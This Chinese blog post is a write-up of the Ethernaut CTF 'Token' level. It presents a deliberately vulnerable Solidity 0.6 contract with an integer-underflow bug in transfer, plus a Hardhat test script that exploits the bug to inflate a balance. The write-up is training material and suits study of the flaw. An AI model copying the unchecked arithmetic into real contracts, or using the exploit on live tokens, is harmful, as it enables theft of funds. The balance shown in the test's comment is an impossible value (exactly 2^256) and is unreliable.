开坑使用Hardhat闯关Ethernaut CTF题,提高合约和测试脚本的能力,后续也会增加Paradigm CTF的闯关题目。
Token合约
任务:最初部署的时候你有初始的20个token,攻击合约让自己的token变多(越多越好)
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Token {
mapping(address => uint256) balances;
uint256 public totalSupply;
constructor(uint256 _initialSupply) public {
balances[msg.sender] = totalSupply = _initialSupply;
}
function transfer(address _to, uint256 _value) public returns (bool) {
require(balances[msg.sender] - _value >= 0);
balances[msg.sender] -= _value;
balances[_to] += _value;
return true;
}
function balanceOf(address _owner) public view returns (uint256 balance) {
return balances[_owner];
}
}
这道题就是考察合约整数溢出漏洞,在合约0.8版本之前,防止溢出需要使用SafeMath
,所以解题思路就非常简单,调用transfer
函数,然后输入一个比20大的数字即可。
测试脚本:
const { expect } = require("chai");
const { ethers } = require("hardhat");
const { MaxUint256 } = require("@ethersproject/constants");
const { BigNumber } = require("ethers");
function expandTo18Decimals(value) {
return BigNumber.from(value).mul(BigNumber.from(10).pow(18));
}
describe("test", function () {
var Token;
it("init params", async function () {
[deployer, ...users] = await ethers.getSigners();
});
it("deploy", async function () {
const TokenInstance = await ethers.getContractFactory("Token");
Token = await TokenInstance.deploy(expandTo18Decimals(20));
});
it("hack test", async function () {
await Token.transfer(users[0].address, expandTo18Decimals(21));
console.log(await Token.balanceOf(deployer.address)); //115792089237316195423570985008687907853269984665640564039456584007913129639936
});
});
运行结果:
Github:hardhat测试仓库
本文参与区块链技术网 ,好文好收益,欢迎正在阅读的你也加入。
- 发表于 2022-09-14 14:20
- 阅读 ( 198 )
- 学分 ( 2 )
- 分类:智能合约